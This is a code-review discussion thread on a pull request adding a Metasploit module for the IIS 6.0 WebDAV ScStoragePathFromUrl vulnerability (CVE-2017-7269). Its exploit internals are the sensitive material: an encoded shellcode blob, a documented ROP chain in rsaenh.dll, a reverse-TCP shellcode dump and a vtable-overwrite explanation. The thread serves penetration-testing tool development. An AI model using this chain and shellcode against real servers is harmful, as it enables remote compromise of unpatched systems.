Add IIS 6.0 ScStoragePathFromUrl exploit (CVE-2017-7269)

[dmchell]

Exploit for cve-2017-7269

[zeroSteiner]

Is this actually necessary to specify?

[zeroSteiner]

[ 'CVE', '2017-7269' ], (you don't need the "CVE-" in the second part.

[zeroSteiner]

In cases where there is an "Original Author" they generally each get their own lines within the module. You can then specify who did what by using comments like:

'Zhiniang Peng',  # original exploit
'Dominic Chell <dominic@mdsec.co.uk>' # metasploit module

[vysecurity]

Pretty sure it's Zhiniang Peng and Chen Wu, don't forget Mr. Wu

[zeroSteiner]

This should really use the HTTP mixin.

[egypt]

That might require some testing. Does adding random headers break the determinism of the victim state, for example?

[zeroSteiner]

These should be broken out so we know what these binary blobs are. I'm assuming their the original exploit's ROP chains, and in that case documenting the gadgets in comments would be really helpful.

[zeroSteiner]

Is this really necessary to specify?

[zeroSteiner]

Generally when there's an original exploit, those others get credit within the module as well. The normal convention is to then specify each author's roles with comments next to their name.

[zeroSteiner]

This should really use the HTTP mixin to make the request.

[zeroSteiner]

I should have referenced the How to Send an HTTP Request wiki page.

[zeroSteiner]

Can these references to http://localhost/... be randomized? Same with the bbbb one below.

[cbrnrd]

@dmchell @zeroSteiner I will be making a PR with a few stylistic changes and improvements

[jamcut]

This did get me a shell, for what its worth...

[cbrnrd]

@jamcut It got me a shell as well; however, the module could use some stylistic and functional improvements (which I am working on now).

[jamcut]

@thecarterb I won't argue that, just commenting on raw usefulness.

[dmchell]

If you're making stylistic changes then you should grab the latest version as I updated it to use Msf::Exploit::Remote::HttpClient as per the feedback

[cbrnrd]

@dmchell Just made the PR on your dmchell-cve-2017-7269 branch

[dmchell]

@thecarterb have you tested it? the PR fails to shell.

[egypt]

Are older versions vulnerable? Doesn't work for me against SP1

[dmchell]

@egypt only tested on SP2 but I'll snapshot and rm the SP and try it

[wwebb-r7]

I'd caution everyone to avoid potentially gilding the lily and focus on the basics. The biggest hurdle you have from @zeroSteiner 's requests is documenting the ROP chain gadget by gadget. It's undoubtedly going to fail against some far flung release five years from now and someone's going to have to debug it.

[dmchell]

@wwebb-r7 absolutely, I put it to the bottom of the list as it was the most time consuming of the review comments, but it's on the TODO rest assured

[rwhitcroft]

@egypt brute forcing the physical path length seems like a requirement since there's no way you'd be able to guess it. In my testing there's no harm in starting at 5 and going up to 40 (or whatever) - it'll work eventually if the server name is right.

[rwhitcroft]

PR coming your way @dmchell

[firefart]

@rwhitcroft why are you removing all progress on this module in your PR?

[rwhitcroft]

How is this not an improvement? What progress did I remove?

[firefart]

@rwhitcroft you removed all added options which are essential for this module to work. You also removed the metasploit stub in the beginning, changed references and so on.

[rwhitcroft]

You're right about the stub, not sure what happened there.

You're wrong about the rest though. The PR requires only that you know the VHOST, so it's actually fewer options. Not sure how this is bad thing. Would you rather have to guess?

[firefart]

@rwhitcroft:
TARGETURI is necessary if you need to set a sub path, ServerName and ServerPort are necessary if you are behind a reverse proxy as these values can be different from RHOST and RPORT.
You should not remove them, instead implement a get_sane_defaults and set them if the user has not set them explicitly.

[rwhitcroft]

Fair enough! PR closed.

[rwhitcroft]

@firefart Trying again - can you take a look? dmchell#6

It doesn't work without setting VHOST, even if ServerName is correct. I took out the physical path length because you shouldn't need it anymore with the brute force.

[busterb]

As mentioned earlier, the ROP chain still needs to be reverse-engineered here. We should have some documentation for how to do this coming up.

[busterb]

Do we really need to force the EncoderType here? (side note - it would be good to be able to specify a preference array here)

[busterb]

It would be nice to add Arch in addition here.

[busterb]

Can this be converted to VHOST / RPORT instead?

[firefart]

@busterb actually not. This has to be the server name of the backend server. In a reverse proxy Setup this does not match the vhost. I think the best would be to make this option optional and implement a method to determine the name. If it's not set use vhost, otherwise use the variable. The same goes for Serverport.

[busterb]

Should this return Appears instead of Vulnerable since it's just checking version instead of exercising the vulnerability?

[egypt]

I think the thing that's really holding this back is that we have no idea what that big blob of unicode is.

@zcgonvh Do you have documentation for it?

[firefart]

@egypt the only analysis I found so far:
http://blog.nsfocus.net/microsoft-windows-server-2003-r2-iis-6-0-remote-code-execution-technical-analysis-solution/
https://0patch.blogspot.co.at/2017/03/0patching-immortal-cve-2017-7269.html

I think someone needs to start reversing the exploit so we can create proper shellcode

[busterb]

I used printf on the shellcode and piped through iconv from UTF-8 to UTF-16LE, and it produces plausible shellcode.

$ printf "\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81" > chars2.txt

$ iconv -f UTF-8 -t UTF-16LE chars2.txt > code2.txt

Shellcode decodes coming soon...

[busterb]

The shorter code courtesy of @sinn3r

0040AEC1     77 6A          JA SHORT iexplore.0040AF2D
0040AEC3     44             INC ESP
0040AEC4     41             INC ECX
....

EDIT..shortened since this was a dead end

[busterb]

The longer one (this might be alpha2 encoded, also thanks to @sinn3r ):

0040AEBA     56             PUSH ESI
0040AEBB     5A             POP EDX
...

EDIT..shortened since this was a dead end

[zcgonvh]

@egypt
its UTF-8 string and will be convert to UTF16-LE.

decoded 1st url (hxxp://test.local:8088/aaaa) contains some paddings(0xc0 bytes? on decoded) and a hard-coded address 0x680312c0 .
decoded 2st url (hxxp://test.local:8088/bbbb) contains paddings(0xb0 bytes? on decoded) ,a fake vtable union from a fake object(with hard-coded address 0x680313c0), and rops,.

on processing,the first memcpy copy 1st url to stack,over written the buffer pointer for 2st url to 0x680312c0.
next memcpy copy 2st url to buffer,over written vtable for IEcb object IEcb object pointer to a fake object 0x680313c0 .
finally,httpext!ScStripAndCheckHttpPrefix+0x1e call function on fake object,and rops run.

[rwhitcroft]

These look like ROP chains, not raw instructions. Looking at the bottom few lines in @busterb's post directly above, you can see ROP gadgets that reside in rsaenh.dll:

0:019> lm m rsaenh
start    end        module name
68000000 68035000   rsaenh     (pdb symbols)          c:\symbols\rsaenh.pdb\1424801011134E3DADD4748A436CFE1C1\rsaenh.pdb

For instance:

0040AF71     68 E7290168    PUSH 680129E7

If this is treated as a gadget instead of a PUSH, it makes a bit more sense:

0:019> u 680129E7
rsaenh!HmacCheck+0x7c7:
680129e7 c9              leave
680129e8 c3              ret

Another one:

0040AF65     32AA 1D02686A  XOR CH,BYTE PTR DS:[EDX+6A68021D]

is probably actually:

0:019> u 68021daa
rsaenh!IsForceHighProtectionEnabled+0x8:
68021daa 8b8010010000    mov     eax,dword ptr [eax+110h]
68021db0 5d              pop     ebp
68021db1 c20400          ret     4

etc...

[egypt]

@busterb The I/O instructions (OUT, OUTS, IN, INS) pretty much always mean that what you have is either not shellcode or decoded incorrectly.

@zcgonvh Thanks for the clarification!

[busterb]

Sometimes Cunningham's law is the best approach.

[rwhitcroft]

Here's a bit more. I'm definitely not an expert so some of this is probably wrong...

Start with this breakpoint, and run the exploit:
ba r4 680313c0

Hitting g 10 times, should land you at the start of the ROP chain:

68006e4f # POP ESI # POP EBP # RETN 20
68006e4f # POP ESI # POP EBP # RETN 20
6800b113 # PUSH 40h # JMP 6800b125 (40h == PAGE_EXECUTE_READWRITE)
6800b125 # POP EAX # POP EBP # RETN 4
680129e7 # LEAVE # RETN
68006e05 # LEA ESP,[EBP-20h] # POP EDI # POP ESI # POP EBX # LEAVE # RETN 24
68009391 # POP EAX # POP EBP # RETN 4
68021daa # MOV EAX,DWORD PTR [EAX+110h] # POP EBP # RETN 4
680129e7 # LEAVE # RETN
680124e3 # JMP DWORD PTR [EBX] (EBX -> SharedUserData!SystemCallStub)
7c8285e8 # MOV EDX,ESP # SYSENTER # RETN

Gadget 68021daa puts 0x8f into EAX, which is the syscall number for NtProtectVirtualMemory:

0:009> dd eax+110 L1
68008356  0000008f

After SYSENTER, the page is executable:

[+] Information about address 0x68031404
    ascii {PAGE_EXECUTE_READWRITE}

And the final shellcode (rev tcp) here:

rsaenh!g_pfnFree+0x1a4:
68031460 56              push    esi
0:009> du esi
68031460  "VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIA"
680314a0  "jXAQADAZABARALAYAIAQAIAQAIAhAAAZ"
680314e0  "1AIAIAJ11AIAIABABABQI1AIQIAIQI11"
68031520  "1AIAJQYAZBABABABABkMAGB9u4JBiliY"
68031560  "QzYpKPkPQMsS5uLKra94Pp9nKOYoTMR4"
680315a0  "O4c0ob38X1mzRKvQkOIEBma4LdqPxkS0"
680315e0  "1N2mCHc0Og0PNQIKqCr3OxJdKPipZhR3"
68031620  "PSnsNvPSoxt9FloO3VkOZ5CUGPBTr90j"
68031660  "mpE0y7jpr30S01iKPSionWaXtnTGf2OO"
680316a0  "yoVu0T0hpMkQIp9pJKp9pPiop71XI5Fx"
680316e0  "wMjGioXU0S23ns2kPLo4kL0QB323Io07"
68031720  "aX7V6L3j49YohUaZyoaXmtzPnU9PioHU"

I'm not sure about the final jump into the shellcode though.

[wwebb-r7]

@rwhitcroft given that the shellcode is going to be stored as unicode, it stands to reason that it's encoded with something like this. I don't have time to test at the moment, but I will later on unless you get to it first.

[wchen-r7]

@firefart and I took a look at this PR and we suggest:

1. The user doesn't need to set the ServerName option. The exploit should automatically send a PROFIND request (with content-legnth as 0), the XML in the response contains the server name and port, and the module can use those automatically.

2. Let's merge the PR that can brute-force the PhysicalPathLength.

[firefart]

I'm currently implementing the changes

[firefart]

@dmchell @rwhitcroft We created a follow up PR with the latest changes over here (commits are preserverd):
#8355

[wchen-r7]

Hi @dmchell, we will go ahead and continue this PR with #8355. You are still fully credited. Thanks!

[dmchell]

@wchen-r7 Sorry guys, my wife spawned (twice) a few weeks ago and it nuked all my R&D time then I lost track of all the comments/requests. I got as far as mostly documenting the ROP chain from rsaenh but it sounds like collectively you've far exceeded this, good work!